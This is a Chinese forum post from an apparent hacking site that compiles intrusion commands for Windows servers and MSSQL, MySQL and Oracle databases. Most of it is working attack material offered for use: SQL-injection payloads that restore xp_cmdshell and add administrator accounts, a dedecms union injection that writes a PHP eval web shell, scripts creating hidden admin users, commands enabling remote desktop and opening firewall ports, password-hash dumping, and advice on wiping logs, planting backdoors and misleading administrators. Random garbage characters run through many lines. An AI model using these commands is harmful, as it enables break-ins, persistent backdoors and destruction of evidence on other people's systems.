中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全
8 g* I1 l& I% v8 C7 k0 A
1.net user administrator /passwordreq:no
; `7 n4 ^9 t$ h1 s, @. x这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了6 K/ J; Q$ Q& X/ Q/ K  P" C
2.比较巧妙的建克隆号的步骤
* \5 I* i# M8 s- O/ @先建一个user的用户
( ~# [+ p5 _- @+ O! Q5 A然后导出注册表。然后在计算机管理里删掉+ F' m; _- D+ ]5 f4 w2 w
在导入,在添加为管理员组
- q% H" Z, I# ~( m3.查radmin密码/ i( n$ G) `$ c5 P6 j
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4 W+ g" p2 N1 E/ g0 \; d4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
' W8 [" y$ {7 u" u4 `5 k" u建立一个"services.exe"的项
4 I, n$ t- M- c* p! [再在其下面建立(字符串值)
; x; @. A% z2 _( }& N, I! k3 Z6 Q6 t键值为mu ma的全路径
3 b! E( [; M# O: Q% K5.runas /user:guest cmd
4 t% M$ n: H) o2 B: e/ ~6 T! w测试用户权限!
2 {4 X+ g- J' K! M9 B* x0 l9 i6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
. b( w( y- ^3 Y/ y: I7.入侵后漏洞修补、痕迹清理,后门置放:) S( g" L2 q9 J$ q1 d* j1 j
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
$ I7 T+ M7 |; U1 ]2 O8 D8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
" h1 v4 T4 C+ l& c
2 R! ~5 d# D3 F8 w7 r& D* ifor example! ]: ^4 ^8 r( H
# P: |. W& `2 u) n3 D/ S, b. A
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
  ^5 X/ i7 e- l, h% G$ K0 B; \  `" u) K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'- q' c( d9 C" c1 v% [

; |* m. z6 \) r9 q% F; a3 T$ n9:MSSQL SERVER 2005默认把xpcmdshell 给ON了  c2 h: G$ A+ h" B7 A. S3 A0 C6 t, j
如果要启用的话就必须把他加到高级用户模式
& \" o4 \1 v& w. m可以直接在注入点那里直接注入0 M! d0 _' g% Y, @% Q/ A1 k9 ]
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--$ ]4 H7 X& L' M6 G
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--/ ?# @0 F5 T1 u1 o1 n* d
或者+ p* _5 q% i& ^' }1 W7 {$ k& ]
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'5 F% E- ]5 Q8 w7 r8 V$ g* N
来恢复cmdshell。* K% j* y' I2 H1 @
# c0 d/ l+ A2 |- |
分析器
1 ~5 q3 M! I' I# S$ d6 m  I* l7 kEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--. j6 W0 W  j) [
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
+ l2 z3 t. |3 _- ^( c, M10.xp_cmdshell新的恢复办法
3 z- u# Y8 ^" Q/ F2 fxp_cmdshell新的恢复办法8 v$ K) X( \" f/ W% Q% _
扩展储存过程被删除以后可以有很简单的办法恢复:
2 ?, h4 ]8 {# ^  C; E9 f* D删除
+ h  Q! ?# j  Mdrop procedure sp_addextendedproc
+ r* Y) y8 U2 p+ K8 j) ?drop procedure sp_oacreate
! j/ p9 G& F3 W. A7 D3 Cexec sp_dropextendedproc 'xp_cmdshell'& V7 w, g3 ~' S2 H

1 }: R6 b7 E( m7 z恢复
0 B5 t  c* {. p! x- s7 ^dbcc addextendedproc ("sp_oacreate","odsole70.dll")
  Z* V" z2 X2 \- }dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
; Y( \* k2 H  ]2 ]) |4 C9 y; j
1 k9 {- h1 t  q0 X: \- Q这样可以直接恢复,不用去管sp_addextendedproc是不是存在
3 D$ z9 g7 n6 l8 o' Y, m
: G  H6 e! l9 z7 V* i; p, m$ k-----------------------------6 L4 |& _$ U) K6 _+ W7 q
% j, l4 T" X' z8 T+ X4 k; x2 V
删除扩展存储过过程xp_cmdshell的语句:) @% ?+ D7 ~- x' Q
exec sp_dropextendedproc 'xp_cmdshell'2 ~2 o: r0 s/ w, R* y

4 b- k; ]* ]! I& A9 I% T; n恢复cmdshell的sql语句/ l3 Y+ e( q/ k: N9 u  W8 z( e
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
2 c% F, Z0 E% o1 e  \% z$ q4 i- R
: e$ s! x  x) m! _9 ?) E: d' F( o, Q. i" i2 ^  W; J3 c
开启cmdshell的sql语句
2 ~- Q) p0 g. P" D2 V) R+ r7 ?& B& \- I2 \# F
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
5 b) _0 ^) H2 s
" ?, B* c% A2 f/ G. l判断存储扩展是否存在: I) q& s  G1 s$ u: k  f
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'' b  \$ D. k* G, ?
返回结果为1就ok% Y0 l% L3 U- @. b( r/ ], j! g
: c4 x6 [" N% g2 n" s! e
恢复xp_cmdshell% E1 K/ t9 d, K1 d
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
  K( n0 V, e8 j* [, f返回结果为1就ok# e0 g/ [  @- @
3 n( `3 a. {3 q
否则上传xplog7.0.dll
, b5 N9 V0 D8 A5 T, o$ ^9 t" Aexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'' ^) A/ Y8 c* ]/ O

) x- ^  Z, T$ B9 ~! u' {堵上cmdshell的sql语句
2 p" N/ K  Q" _+ a3 I$ U, ~7 |sp_dropextendedproc "xp_cmdshel
" [4 r# T8 l% g) c5 |1 g/ n! S) k& d-------------------------
0 y7 @) l/ W6 U. o' H8 h清除3389的登录记录用一条系统自带的命令:1 A# ^; E" q' x. W+ d
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f  Q, P6 H( q6 i3 Q' |
! W! B7 D4 T/ n4 S
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
( O) `9 V5 _- L! `6 Z# Q在 mysql里查看当前用户的权限
. r+ a9 S: d" c! ?7 w0 F$ z5 p% yshow grants for  
' l# U0 B. H9 _) e2 Q6 G! C# Q( R4 H$ X- U" J6 f! F$ W! i
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
# P$ @2 }, o: X* p4 P
& i  O2 ^) G/ _( t( p
7 Y. k& ?5 M9 I" P& VCreate USER 'itpro'@'%' IDENTIFIED BY '123';
* [6 p0 i% |, t5 x! `) A, O, D7 K3 s' C1 c) v( ]" N/ e$ x
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION- R9 Y8 ]! Z$ g. ?9 E
2 h  P' o7 a% }/ \  s% k
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 08 Q' P% _, y. e( B5 ^6 a5 B

% Q  L5 h' d& A  fMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
2 @0 A- @) R* O) Y1 c( Z" _2 v
' s" Y; k( g  c, a+ \) A搞完事记得删除脚印哟。' F  N6 U" z4 h" m

* m- b  F# h/ |1 p0 x5 hDrop USER 'itpro'@'%';9 [) v0 e" e: l/ q1 p1 b( j9 u% \
# Q: H. y0 e2 M$ S
Drop DATABASE IF EXISTS `itpro` ;
* \  D  \3 ~. o6 u. U* q3 B& p
8 S6 ?4 w" c# i, n当前用户获取system权限' p" k* _* J/ {+ d- E0 k
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact' W' q  r4 \/ L5 C2 C
sc start SuperCMD
' P6 f5 E' M2 @% I& ]程序代码
  g) l+ C% p- g7 t$ ?9 @<SCRIPT LANGUAGE="VBScript">5 o- A: ?& O: X3 Q0 J1 h7 o
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
7 d: c9 o7 R4 B4 a2 d' Y, D, los="WinNT://"&wsnetwork.ComputerName
: Z8 \+ Y  [) F9 _# k2 GSet ob=GetObject(os)
( H/ X* c4 \* n7 J+ T% n& n. R5 gSet oe=GetObject(os&"/Administrators,group")( X5 H5 g+ V0 ^# `" v2 y
Set od=ob.Create("user","nosec")6 d: ?1 M, Y$ G# g7 `; s
od.SetPassword "123456abc!@#"
' U( |2 y7 j- S; V* r/ ?+ m& god.SetInfo; |/ a- E$ F9 ^+ O( F( ?
Set of=GetObject(os&"/nosec",user)
% f0 g4 |& D5 ~2 U* Q- \8 T1 joe.add os&"/nosec"
" V6 z- ^% \: H$ q3 V  W/ q</Script>. _- @, n  o. j" Y
<script language=javascript>window.close();</script>
' z& J  x( F$ q8 R# y1 K0 \/ P
; N+ g/ K) ]3 V2 }# u4 E1 c/ ]' ?& i- O4 T9 w0 |$ T
# S% C+ C( M8 E5 K/ v- `
7 U: N8 U4 e& Z7 W; S2 w" Q
突破验证码限制入后台拿shell
. g  v4 D8 ^0 c2 Q1 j6 |3 s! \程序代码7 V" U5 h( U, S  V" }: I& \
REGEDIT4 9 n# K7 I9 t4 z+ v% P
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
0 @) v- b1 i3 i' U8 Q9 W  K+ C"BlockXBM"=dword:00000000  l" J4 E/ e9 q- u" O0 M# i! \
6 C- w3 N! L+ P$ q2 C# M
保存为code.reg,导入注册表,重器IE
# Z4 D" W; @( c$ C% n+ P2 v2 c就可以了
( a3 P/ E. c/ Xunion写马' f/ {, o+ R& X
程序代码9 W. k$ [  w8 G' s" {
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
  W  u7 p  p8 `0 a- y3 \1 ]  [8 c" j
应用在dedecms注射漏洞上,无后台写马  |2 \' A" W" ~* d
dedecms后台,无文件管理器,没有outfile权限的时候
" p0 u) h8 d. k( R在插件管理-病毒扫描里
) W1 k5 _0 T: \  B写一句话进include/config_hand.php里
! Q1 I& O- E! Z# {" R6 M( s8 n程序代码
4 i( j- h/ a9 U$ K>';?><?php @eval($_POST[cmd]);?># ]. h3 a& w, f9 H
# Y5 u1 n5 \1 e  F5 f' d

5 Z8 D. r* R' L# z$ L如上格式
2 ~! A0 k6 v2 u. _/ U+ r6 M% X) s. \# I5 j$ G/ ~# u
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解5 _$ I: T* \9 O+ Z7 y$ m! y
程序代码, ?$ e9 X4 p1 Y4 l6 j) i
select username,password from dba_users;
6 x" y; j  E, Z" G- Q7 Z& q2 r, D( U$ D. @' F
& S- P$ I/ x$ o' d
mysql远程连接用户( }8 w) A( S4 T) i% E# m# U. B$ {5 G3 w
程序代码$ u5 X) p2 D8 e' ]8 H2 b2 W

, S8 j- z& x6 t  L% jCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';. W5 }* J( a4 m
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
7 U- H; @3 ^" ?* A) hMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0; O: x* `& ^; {8 Q
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
6 Q/ @" x  i4 a7 m: K
  A+ X# L; C4 l/ Z$ [" R, W* Z2 ]1 h; t1 u7 D# M4 K; `& y3 b! Y5 S4 r

8 y5 c* ]3 E( ]6 y
" A3 r% Y. E* ?echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
* T) U( O; v4 v2 _$ x/ [8 O) S6 l2 |( @9 i; b6 Y
1.查询终端端口
7 I5 @1 g, X1 E, U& l; ^0 r9 x% R
8 ^/ M: ?2 ^% G4 Y4 i6 rxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2 [- G* |! H' k  f+ g% W: `. ?8 z" p
. X7 @; n, S: ?9 k% {2 B通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"4 S* B% K2 B$ y
type tsp.reg9 x! B* f; G% v% L
7 ~2 g0 j5 ^5 h
2.开启XP&2003终端服务: W8 h: m' m9 r* a" V" p& t1 ]

! J1 M/ b/ z# }. }3 c6 \" }# J( a2 P3 J& y0 k# Z
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
9 l, v  s; {' R) Z. n9 J" T. Z; S" ^

9 J2 ~2 d; ~0 s+ f3 TREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f9 U9 E* S4 P4 N1 q8 L' y

1 Y7 x0 m" h" U" C3.更改终端端口为20008(0x4E28)( _; T# I% A+ k3 q  p
  }! [, F: B# b
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
+ j& r' D: R: g1 _# |8 b3 o; B% T- j$ W8 y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f  o0 x6 F7 M  X/ R$ {$ A

$ \1 h" q' f# r  Y9 c, k0 x$ L4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制0 ?4 S$ V/ _  s! v
# i+ h+ |8 F5 u( }: J3 N
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f- U8 o$ ~. y. u( q

8 T- m! n" M9 Z; L1 u) {. L: i2 S( y* Y: y
5.开启Win2000的终端,端口为3389(需重启)
1 E# R2 K3 S& \: @
: _: D8 f- X' [echo Windows Registry Editor Version 5.00 >2000.reg , Z0 C: ]2 p3 F! {* f4 X. N% k
echo. >>2000.reg& Q! ^# g  I6 |% b
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg % n7 B3 p/ l' M+ s/ M
echo "Enabled"="0" >>2000.reg 6 ~$ h) C: @' G) I: v# R1 l$ Q! j
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 4 F, [  C, Q1 G- ]+ g8 B
echo "ShutdownWithoutLogon"="0" >>2000.reg
3 T5 O; J, A* d& t" n8 x2 V8 {+ t* t  ]echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
! q6 P* r( p1 C, U" f6 l# Yecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg 6 K3 S% s2 a7 z$ e5 f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
, ?7 V4 D5 d6 t8 ^; [/ o- p" h+ Uecho "TSEnabled"=dword:00000001 >>2000.reg ( s+ Z+ o/ i# x& n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 6 V. Y/ G" j: s% Q. C
echo "Start"=dword:00000002 >>2000.reg 3 X# u2 f5 ?5 |; D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 4 Y! E. t" M5 L9 n  I6 A5 M
echo "Start"=dword:00000002 >>2000.reg
0 X9 P, n; o2 P; wecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
/ n. N, L8 C" F# recho "Hotkey"="1" >>2000.reg 9 p; N! |, M: k7 X6 R9 w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
" d4 X( t) d& l" `; hecho "ortNumber"=dword:00000D3D >>2000.reg 6 m, P( p' O* j& N& D1 Q; b# O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg * X+ g7 Z  o( h, H# N, a
echo "ortNumber"=dword:00000D3D >>2000.reg
( S2 w2 `( E  o2 j. m( ~, N) t
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)# S$ Y1 A3 _9 t$ M) m" `

8 u- D, a+ @+ h( r  j@ECHO OFF & cd/d %temp% & echo [version] > restart.inf% h. U7 I" r  G
(set inf=InstallHinfSection DefaultInstall)' [4 S' k; ^0 z# N: L1 G3 I
echo signature=$chicago$ >> restart.inf
. k; O+ K& F  A' I/ u! cecho [defaultinstall] >> restart.inf
7 ]/ V1 p5 O0 D- Frundll32 setupapi,%inf% 1 %temp%\restart.inf
: ~2 B) P% l$ E4 d9 b. o
' n5 {* K$ j0 B1 s0 C+ ~. l, ^# B9 Q  v  K
7.禁用TCP/IP端口筛选 (需重启)- R0 q. ]% W3 `# v0 b
7 H) M* y- r( c. d0 D, U
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f% t6 M$ ?2 m# [9 S
( v* ?- a5 `2 t. ?. W
8.终端超出最大连接数时可用下面的命令来连接, O8 V! {$ F5 Y5 h. j, B4 `% b

- Y" L  w* f2 s) a4 P* a; k$ Y) Cmstsc /v:ip:3389 /console
3 `) f: J& [7 G0 y
5 ]+ |# H+ ~/ M) \( ]/ T- n9.调整NTFS分区权限
6 P# l8 ~, ~( _% M: n$ I" O4 k% N: U  |/ d$ q. Z
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
% v# j1 g8 I6 m+ \  Q; S7 c  d6 Z  V5 V. x- m4 g; ~6 O
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
; L. h/ J9 {- N
4 D: }1 D. T0 f$ q+ M" C# z------------------------------------------------------
2 `; m& Q: Q/ S3389.vbs
2 r; M6 e4 E- jOn Error Resume Next
. ~/ W/ [/ x5 b/ m3 V( @: [( A9 bconst HKEY_LOCAL_MACHINE = &H80000002; w% N: m5 P8 r4 Q  f- _
strComputer = "."& I) J  s% Q; w, C% c+ E
Set StdOut = WScript.StdOut8 }$ N# F7 x/ i1 M8 A$ Y
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_: |& `) L$ G, `9 }; |' X+ r
strComputer & "\root\default:StdRegProv")' c" Z2 E7 w) `8 m# k8 @6 H
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
7 e1 n2 F. v2 w, P9 Z! loreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath4 Z7 c8 c) E! C# \
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp": ~% \  I" a4 @/ J
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath( g7 y  U9 Q6 ^2 E) H+ K# i* M
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"9 o; E! Y: b0 L' F2 r; X# d
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"+ ?- E* c4 T" X( u7 A: o; Z' [
strValueName = "fDenyTSConnections"
* h0 C* X* }- R4 o4 edwValue = 00 X( w: e; C& j! D' ^7 Y
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# [7 U% r2 y, x* x1 q$ |strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp": s3 s7 \2 ^4 K' f  t
strValueName = "ortNumber"" c+ Q4 `  y0 T" J- e6 t
dwValue = 3389! e3 ?- }' ]1 J8 W% D
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue& ~- W# i, l, R* m" X0 j$ k
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
" v* Z0 \; N( E" S: astrValueName = "ortNumber"
0 @  H9 T0 H3 n# [: D4 J5 \  A" rdwValue = 3389
) G: h) ~! s& L: Ooreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! c: m' i$ c. o( fSet R = CreateObject("WScript.Shell")
, ^' S/ x6 y2 `: n- S- l0 E; AR.run("Shutdown.exe -f -r -t 0")
- a3 b: b7 S" d) w; ~, c  ]) g; N$ P# g
删除awgina.dll的注册表键值
. b; Y. [" f2 g程序代码
; }. Q+ m3 T/ `6 M/ T6 {- D/ |
# R7 I( r- T5 S' B- L+ \reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
2 Q1 h+ T) f; t. L9 A) g; }8 |( [, d; v* Y% @

7 M( V9 S- x# e5 j# l* x6 ?' u% |5 ]2 H/ R3 v
0 W1 b: S8 g. U
程序代码5 [9 b3 j# D7 d4 j
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash2 K& \" ]+ D% k9 ]3 I- {1 P

" V8 H& y5 L3 }7 `; H) J# s2 L设置为1,关闭LM Hash
; }/ B7 f, R: M& M& I  h
+ G; ?6 U. R- U% A数据库安全:入侵Oracle数据库常用操作命令
" D& L$ W4 p+ _3 d4 D) _& b: C最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
1 C( ^  Y! q' \; C; V1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。7 O. m- M" @7 q- v$ R7 y" T5 b$ ^3 e
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
9 k- v* V1 _; r7 n3、SQL>connect / as sysdba ;(as sysoper)或
  w" q# `7 ?  b9 j. R' Y# `1 Yconnect internal/oracle AS SYSDBA ;(scott/tiger)
, W2 ]2 [7 z  }7 D5 [conn sys/change_on_install as sysdba;* d  w0 N) c4 w* G6 ]
4、SQL>startup; 启动数据库实例
7 Y: D+ Y- C' u' j5、查看当前的所有数据库: select * from v$database;
" t" _" h' L7 l+ V# S0 ~select name from v$database;4 G$ X- T* S7 A8 ?3 h, [; w# ^
6、desc v$databases; 查看数据库结构字段
3 q, Y# B' H8 ?) Q8 X3 N7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:8 p: ~7 D# j% h( `
SQL>select * from V_$PWFILE_USERS;
  `5 ?  `9 B( \+ N! t6 pShow user;查看当前数据库连接用户
4 M9 ?) }$ f3 \( m4 ]/ I8、进入test数据库:database test;2 e) T$ \1 t+ N5 o1 [  K# |
9、查看所有的数据库实例:select * from v$instance;1 h% ]2 W  T* r* u- y
如:ora9i0 e6 t8 g4 g" h$ i+ K6 }, d
10、查看当前库的所有数据表:+ R, U! X3 G" M, y2 z
SQL> select TABLE_NAME from all_tables;* F" L0 f( w+ g  Y  n% {# d
select * from all_tables;. C' U2 P8 c- `: W+ }% h
SQL> select table_name from all_tables where table_name like '%u%';: O$ g/ m8 }- D6 Z2 m3 \
TABLE_NAME* v9 D3 O% T5 g+ m( x
------------------------------4 H& \5 D* ^6 }4 Z
_default_auditing_options_
) r5 O, b+ D: s1 ~5 t% D% v11、查看表结构:desc all_tables;6 d/ k. C# K  h
12、显示CQI.T_BBS_XUSER的所有字段结构:) d/ }  b9 M- c2 l
desc CQI.T_BBS_XUSER;
- S/ f2 m  v6 o: n. n2 l3 a13、获得CQI.T_BBS_XUSER表中的记录:, ^/ E) Q; I5 V& A6 E9 i0 k9 I
select * from CQI.T_BBS_XUSER;1 X9 ~  Q" X* t+ m; L
14、增加数据库用户:(test11/test)
! _+ P) e9 M) @: S+ e) O" h9 u% n# wcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;, T9 `4 s5 E! u2 h- H2 z5 U7 u& f% Z
15、用户授权:  ~* \  i9 \$ V7 Q" A2 V
grant connect,resource,dba to test11;
& X9 A9 g9 w4 X8 t9 Ggrant sysdba to test11;
) z5 T( L( }& M# mcommit;
5 i) B) j& L! n  K16、更改数据库用户的密码:(将sys与system的密码改为test.)
; W, ~; Q+ p( I% valter user sys indentified by test;5 j! d* v3 ?: a0 v( o1 J2 b9 ]
alter user system indentified by test;- i" \" {8 S6 [$ \$ p5 w2 V

  {4 j+ L% ~5 G+ Z& ZapplicationContext-util.xml
3 J5 E5 j+ \) s$ ~' W/ PapplicationContext.xml
% \. D* S: o0 i+ S# \struts-config.xml6 @) H" ~' u2 T: u4 Z$ W
web.xml
8 t  G* O* Z# A1 Z" G8 \3 bserver.xml
) O+ `1 {  n5 g& C6 f) W/ h6 S! Ztomcat-users.xml
5 ^/ h* |! Q5 j! P) phibernate.cfg.xml$ L9 T8 q$ O4 B, x$ I5 T* x/ G
database_pool_config.xml
# v' t0 C" ], G' B8 F4 h# h, A$ ^" f0 j0 G% O
) Y8 b& M$ t. C& G/ ]6 A
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
, Q. t+ b  g. z& h\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini" \4 {" P& T/ y. e, c- Q
\WEB-INF\struts-config.xml  文件目录结构- W9 l3 w) N0 I
8 c! w5 R' l+ I; g1 ?$ H2 ?8 h
spring.properties 里边包含hibernate.cfg.xml的名称& t* c, O6 G! S( P
& y. @  Z3 r6 h+ R: @2 J4 K% X

: s# `8 y( _3 q" q1 N1 @  m8 UC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml' g9 s/ W' ^% ]; z+ w
5 {# q/ t! o. m; }
如果都找不到  那就看看class文件吧。。1 |2 H7 |! x. T. W

6 J: K5 F9 J8 u测试1:% J. Z2 x# e( M5 ]' v0 h
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
! `$ d6 e3 ~/ \1 Z1 x
# A' c3 J: l( v5 H  p测试2:& g; R& R$ A' W5 G9 k0 o: L

: B+ M& [: }" h3 h& d! M) K3 q4 Rcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
. {' B* ^3 Z7 |, y+ m% |8 n6 Z' m- G7 I( L. Y+ L
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--8 d7 k8 }! b+ F' G2 K! Z

, r  R3 K; ?6 Q0 Z, `% F! pSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
6 N/ z- |1 @+ {- A$ x1 L0 G
. l6 g  ^  c7 i# Q. {; X* A+ I% M( ^( X查看虚拟机中的共享文件:
- C1 t+ M) l! [在虚拟机中的cmd中执行! t1 h* u! H7 w$ l
\\.host\Shared Folders
3 e8 W! r6 [5 l0 ^* V
3 ~; P3 F8 `* E) @5 l* p2 T- ucmdshell下找终端的技巧+ L; ?* g7 C0 [. h/ ^
找终端: " H. `+ y* T! h& y1 b
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! . s8 n( _  {# S; z- t8 n: n; h+ z4 `
   而终端所对应的服务名为:TermService
: i) Z8 q9 o: q( u# K- `第二步:用netstat -ano命令,列出所有端口对应的PID值!
# f$ N7 G1 @5 r9 r& B2 u) a+ _   找到PID值所对应的端口
2 S$ z* S5 K7 e/ ?9 p2 U. y
0 c) E8 o) E' N$ ^) \2 j查询sql server 2005中的密码hash2 l# R4 a6 A+ [( W
